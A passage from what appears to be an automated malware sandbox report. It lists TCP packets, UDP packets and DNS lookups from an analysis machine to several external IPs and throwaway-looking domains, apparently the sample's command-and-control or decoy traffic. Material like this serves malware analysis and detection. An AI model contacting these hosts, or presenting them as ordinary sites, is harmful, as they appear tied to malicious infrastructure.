                                                                                Oct 10, 2024 14:39:05.768614054 CEST8049896162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:06.391408920 CEST8049896162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:06.391472101 CEST8049896162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:06.391557932 CEST4989680192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:07.268796921 CEST4989680192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.287179947 CEST4991480192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.292026043 CEST8049914162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:08.292130947 CEST4991480192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.297925949 CEST4991480192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.302841902 CEST8049914162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:08.912643909 CEST8049914162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:08.912688971 CEST8049914162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:08.912810087 CEST4991480192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.915405035 CEST4991480192.168.2.5162.0.238.246
                                                                                Oct 10, 2024 14:39:08.920177937 CEST8049914162.0.238.246192.168.2.5
                                                                                Oct 10, 2024 14:39:14.448383093 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:14.453183889 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:14.453341961 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:14.463089943 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:14.467931032 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300189018 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300240040 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300249100 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300297022 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300307035 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300354004 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:15.300354004 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:15.300395012 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300405025 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300414085 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300441980 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:15.300481081 CEST8049946183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:15.300488949 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:15.300580025 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:15.971838951 CEST4994680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:16.996515036 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.001478910 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.001573086 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.015980005 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.020767927 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881508112 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881541967 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881558895 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881601095 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881618023 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881640911 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.881684065 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881715059 CEST8049959183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:17.881810904 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.881810904 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:17.881810904 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:18.518953085 CEST4995980192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:19.567426920 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:19.572604895 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:19.572705984 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:19.654082060 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:19.659091949 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:19.659121037 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.434947968 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.434971094 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.434988022 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.435096979 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:20.435168982 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.435184956 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.435200930 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.435220003 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:20.435264111 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:20.435555935 CEST8049976183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:20.435609102 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:21.159341097 CEST4997680192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:22.178312063 CEST4998380192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:22.183576107 CEST8049983183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:22.183757067 CEST4998380192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:22.191097975 CEST4998380192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:22.196103096 CEST8049983183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:23.028951883 CEST8049983183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:23.029012918 CEST8049983183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:23.029134989 CEST4998380192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:23.031837940 CEST4998380192.168.2.5183.181.83.131
                                                                                Oct 10, 2024 14:39:23.036689043 CEST8049983183.181.83.131192.168.2.5
                                                                                Oct 10, 2024 14:39:28.094938993 CEST4998480192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:28.100263119 CEST804998413.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:28.100445986 CEST4998480192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:28.123059988 CEST4998480192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:28.128084898 CEST804998413.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:28.560952902 CEST804998413.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:28.561176062 CEST4998480192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:29.628098011 CEST4998480192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:29.635363102 CEST804998413.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:30.653825045 CEST4998580192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:30.658694029 CEST804998513.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:30.658766985 CEST4998580192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:30.669511080 CEST4998580192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:30.674309015 CEST804998513.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:31.127213955 CEST804998513.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:31.127609015 CEST4998580192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:32.175082922 CEST4998580192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:32.182682037 CEST804998513.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:33.194943905 CEST4998680192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:33.199932098 CEST804998613.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:33.200045109 CEST4998680192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:33.210835934 CEST4998680192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:33.215725899 CEST804998613.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:33.215758085 CEST804998613.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:33.663242102 CEST804998613.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:33.663338900 CEST4998680192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:34.721718073 CEST4998680192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:34.728636980 CEST804998613.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:35.750241995 CEST4998880192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:35.755793095 CEST804998813.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:35.755882978 CEST4998880192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:35.764204025 CEST4998880192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:35.769273043 CEST804998813.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:36.222476006 CEST804998813.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:36.222625971 CEST804998813.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:36.222739935 CEST4998880192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:36.225382090 CEST4998880192.168.2.513.248.169.48
                                                                                Oct 10, 2024 14:39:36.230268955 CEST804998813.248.169.48192.168.2.5
                                                                                Oct 10, 2024 14:39:41.700989008 CEST4998980192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:41.705857992 CEST8049989195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:41.705986023 CEST4998980192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:41.718698025 CEST4998980192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:41.723603010 CEST8049989195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:43.221765041 CEST4998980192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:43.270925045 CEST8049989195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:44.242526054 CEST4999080192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:44.247654915 CEST8049990195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:44.250515938 CEST4999080192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:44.266417980 CEST4999080192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:44.271229029 CEST8049990195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:45.768497944 CEST4999080192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:45.822854042 CEST8049990195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:46.787575960 CEST4999180192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:46.793215036 CEST8049991195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:46.793414116 CEST4999180192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:46.804101944 CEST4999180192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:46.809180975 CEST8049991195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:46.809189081 CEST8049991195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:48.315366983 CEST4999180192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:48.363121986 CEST8049991195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:49.335460901 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:49.341325045 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:39:49.341393948 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:49.350431919 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:39:49.356173992 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:03.089030027 CEST8049989195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:03.089451075 CEST4998980192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:05.638622046 CEST8049990195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:05.638710022 CEST4999080192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:08.167908907 CEST8049991195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:08.167995930 CEST4999180192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:11.420360088 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:11.420376062 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:11.420435905 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:11.420464993 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:11.420499086 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:11.420499086 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:11.421320915 CEST4999280192.168.2.5195.161.68.8
                                                                                Oct 10, 2024 14:40:11.426166058 CEST8049992195.161.68.8192.168.2.5
                                                                                Oct 10, 2024 14:40:24.794248104 CEST4999380192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:24.800504923 CEST804999345.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:24.800626993 CEST4999380192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:24.809365988 CEST4999380192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:24.815469027 CEST804999345.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:25.713057995 CEST804999345.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:25.713119984 CEST804999345.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:25.713171959 CEST4999380192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:26.315315962 CEST4999380192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:27.337935925 CEST4999480192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:27.343225956 CEST804999445.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:27.343357086 CEST4999480192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:27.352418900 CEST4999480192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:27.357420921 CEST804999445.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:28.250217915 CEST804999445.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:28.250246048 CEST804999445.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:28.250303030 CEST4999480192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:28.862214088 CEST4999480192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:29.882874012 CEST4999580192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:29.889349937 CEST804999545.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:29.889451027 CEST4999580192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:29.903953075 CEST4999580192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:29.910286903 CEST804999545.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:29.910444975 CEST804999545.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:30.861762047 CEST804999545.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:30.861794949 CEST804999545.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:30.861936092 CEST4999580192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:31.408879995 CEST4999580192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:32.429308891 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:32.434397936 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:32.434737921 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:32.443655968 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:32.448493958 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346507072 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346543074 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346582890 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346615076 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346633911 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346649885 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346652985 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:33.346671104 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346709967 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:33.346759081 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:33.346895933 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:33.353918076 CEST4999680192.168.2.545.194.36.12
                                                                                Oct 10, 2024 14:40:33.358769894 CEST804999645.194.36.12192.168.2.5
                                                                                Oct 10, 2024 14:40:38.590337038 CEST4999780192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:38.595345020 CEST80499973.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:38.596419096 CEST4999780192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:38.606635094 CEST4999780192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:38.611546040 CEST80499973.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:39.051589012 CEST80499973.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:39.051697016 CEST4999780192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:40.112005949 CEST4999780192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:40.117038012 CEST80499973.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:41.134193897 CEST4999880192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:41.139230013 CEST80499983.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:41.139336109 CEST4999880192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:41.154865026 CEST4999880192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:41.159811974 CEST80499983.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:41.600503922 CEST80499983.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:41.600630045 CEST4999880192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:42.658876896 CEST4999880192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:42.664027929 CEST80499983.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:43.677612066 CEST4999980192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:43.682847023 CEST80499993.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:43.683048010 CEST4999980192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:43.694454908 CEST4999980192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:43.699414968 CEST80499993.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:43.699475050 CEST80499993.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:45.239896059 CEST4999980192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:45.245376110 CEST80499993.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:45.245464087 CEST4999980192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.257569075 CEST5000080192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.262850046 CEST80500003.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:46.262988091 CEST5000080192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.269944906 CEST5000080192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.274853945 CEST80500003.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:46.748471975 CEST80500003.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:46.748512030 CEST80500003.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:40:46.748670101 CEST5000080192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.751533985 CEST5000080192.168.2.53.33.130.190
                                                                                Oct 10, 2024 14:40:46.756480932 CEST80500003.33.130.190192.168.2.5
                                                                                Oct 10, 2024 14:41:00.050501108 CEST5000180192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:00.055522919 CEST805000185.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:00.058233976 CEST5000180192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:00.069731951 CEST5000180192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:00.074637890 CEST805000185.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:01.580626965 CEST5000180192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:01.585797071 CEST805000185.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:01.588253021 CEST5000180192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:02.618180990 CEST5000280192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:02.623111010 CEST805000285.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:02.623195887 CEST5000280192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:02.635318041 CEST5000280192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:02.640302896 CEST805000285.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:04.146092892 CEST5000280192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:04.151678085 CEST805000285.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:04.151984930 CEST5000280192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:05.216764927 CEST5000380192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:05.221757889 CEST805000385.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:05.221863985 CEST5000380192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:05.385277033 CEST5000380192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:05.390218019 CEST805000385.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:05.390347958 CEST805000385.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:06.893182039 CEST5000380192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:06.898704052 CEST805000385.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:06.898821115 CEST5000380192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:07.912426949 CEST5000480192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:07.917490005 CEST805000485.159.66.93192.168.2.5
                                                                                Oct 10, 2024 14:41:07.917587042 CEST5000480192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:07.925013065 CEST5000480192.168.2.585.159.66.93
                                                                                Oct 10, 2024 14:41:07.929970026 CEST805000485.159.66.93192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 10, 2024 14:38:39.121613979 CEST5793953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:38:39.132127047 CEST53579391.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:38:44.148885012 CEST6552653192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:38:44.380382061 CEST53655261.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:39:00.334836006 CEST6269353192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:39:00.636583090 CEST53626931.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:39:13.930557013 CEST4920953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:39:14.445772886 CEST53492091.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:39:28.047903061 CEST5840953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:39:28.060301065 CEST53584091.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:39:41.242968082 CEST6026353192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:39:41.698427916 CEST53602631.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:40:16.430269003 CEST6336653192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:40:16.441535950 CEST53633661.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:40:24.505763054 CEST5529953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:40:24.791829109 CEST53552991.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:40:38.366169930 CEST5366953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:40:38.585716009 CEST53536691.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:40:51.758117914 CEST6255953192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:40:51.767798901 CEST53625591.1.1.1192.168.2.5
                                                                                Oct 10, 2024 14:40:59.959332943 CEST5177453192.168.2.51.1.1.1
                                                                                Oct 10, 2024 14:41:00.047595024 CEST53517741.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 10, 2024 14:38:39.121613979 CEST192.168.2.51.1.1.10xcae4Standard query (0)www.kabaribukota.pressA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:38:44.148885012 CEST192.168.2.51.1.1.10xd524Standard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:00.334836006 CEST192.168.2.51.1.1.10xf8e9Standard query (0)www.jophy.lifeA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:13.930557013 CEST192.168.2.51.1.1.10x693aStandard query (0)www.nakama2-sshl.xyzA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:28.047903061 CEST192.168.2.51.1.1.10x8d66Standard query (0)www.comedy.financeA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:41.242968082 CEST192.168.2.51.1.1.10xa0aeStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:16.430269003 CEST192.168.2.51.1.1.10x9e57Standard query (0)www.48vlu.shopA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:24.505763054 CEST192.168.2.51.1.1.10xe6c1Standard query (0)www.085bet.xyzA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:38.366169930 CEST192.168.2.51.1.1.10x3bc7Standard query (0)www.rjscorp.orgA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:51.758117914 CEST192.168.2.51.1.1.10xff96Standard query (0)www.pussy.couponsA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:40:59.959332943 CEST192.168.2.51.1.1.10x2710Standard query (0)www.mudanya-nakliyat.xyzA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 10, 2024 14:38:39.132127047 CEST1.1.1.1192.168.2.50xcae4Name error (3)www.kabaribukota.pressnonenoneA (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:38:44.380382061 CEST1.1.1.1192.168.2.50xd524No error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 10, 2024 14:38:44.380382061 CEST1.1.1.1192.168.2.50xd524No error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:00.636583090 CEST1.1.1.1192.168.2.50xf8e9No error (0)www.jophy.life162.0.238.246A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:14.445772886 CEST1.1.1.1192.168.2.50x693aNo error (0)www.nakama2-sshl.xyz183.181.83.131A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:28.060301065 CEST1.1.1.1192.168.2.50x8d66No error (0)www.comedy.finance13.248.169.48A (IP address)IN (0x0001)false
                                                                                Oct 10, 2024 14:39:28.060301065 CEST1.1.1.1192.168.2.50x8d66No error (0)www.comedy.finance76.223.54.146A (IP address)IN (0x0001)false
